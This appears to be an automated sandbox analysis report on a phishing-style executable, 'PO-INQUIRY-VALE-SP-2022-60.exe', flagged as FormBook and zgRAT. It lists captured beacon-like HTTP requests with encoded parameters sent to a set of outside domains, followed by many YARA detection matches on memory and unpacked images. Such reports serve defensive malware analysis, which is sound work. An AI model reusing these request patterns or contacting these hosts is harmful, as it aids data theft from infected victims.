        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.expoj3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.danilhodoekhi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=YaH7gYIDTqY4cEQIM97hHwWq2XV+liDGv7Lmousy66vButcLOjPrknKPAsD+A1J6Q9LI&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.pieprop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.jamiebakes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.trustedhomebuying.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.jupiter-directory.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.route112mitsubishi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm HTTP/1.1Host: www.popcornpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT HTTP/1.1Host: www.heiboard.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh HTTP/1.1Host: www.burntkeroseneblueheelers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptoj HTTP/1.1Host: www.medicaleducationbangladesh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh HTTP/1.1Host: www.lingmao08.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R HTTP/1.1Host: www.jamiebakes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh HTTP/1.1Host: www.theminercrypto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfOvAU/+&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.expoj3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=Cda/DfRT+Myk92AVL8ZtInJusJj7ZXm0kCkpHstkNcvq7ssbimt58lhEnh+W6KwWQFgT&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.danilhodoekhi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.3.PO-INQUIRY-VALE-SP-2022-60.exe.44452d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.7b10000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.469891421.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
